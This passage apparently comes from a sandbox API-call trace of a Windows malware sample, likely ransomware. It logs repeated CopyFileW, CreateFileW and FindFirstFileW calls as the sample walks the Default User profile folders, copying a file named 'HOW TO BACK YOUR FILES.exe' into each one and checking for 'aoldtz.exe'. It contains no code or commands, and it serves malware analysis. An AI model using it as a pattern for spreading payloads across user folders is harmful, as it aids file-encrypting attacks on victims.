returned -1 [0066.028] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0066.028] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0066.028] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.028] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.028] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.029] GetLastError () returned 0x0 [0066.029] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.029] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.029] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.029] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.029] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0066.030] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0066.030] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.030] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.030] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.030] GetLastError () returned 0x0 [0066.030] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.031] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.031] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.031] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.031] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0066.031] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0066.031] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.031] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.032] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.032] GetLastError () returned 0x0 [0066.032] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.032] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558e6620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558e6620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.032] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.032] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.032] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0066.032] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0066.032] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.032] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.033] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.033] GetLastError () returned 0x0 [0066.033] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.033] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559328e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.033] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.033] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.033] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0066.034] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0066.034] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.034] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.034] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.034] GetLastError () returned 0x0 [0066.034] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.034] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55958a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.035] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.035] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.035] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0066.035] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0066.035] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.035] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.035] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.036] GetLastError () returned 0x0 [0066.036] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.036] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.036] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.036] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.036] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0066.036] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0066.036] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.036] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.037] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.037] GetLastError () returned 0x0 [0066.037] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.037] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559a4d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559a4d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.037] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.037] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.037] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0066.038] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0066.038] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.038] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.038] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.038] GetLastError () returned 0x0 [0066.038] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.038] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.039] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.039] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.039] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0066.039] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0066.039] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.039] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.039] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.040] GetLastError () returned 0x0 [0066.040] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.040] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.040] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.040] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.040] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows 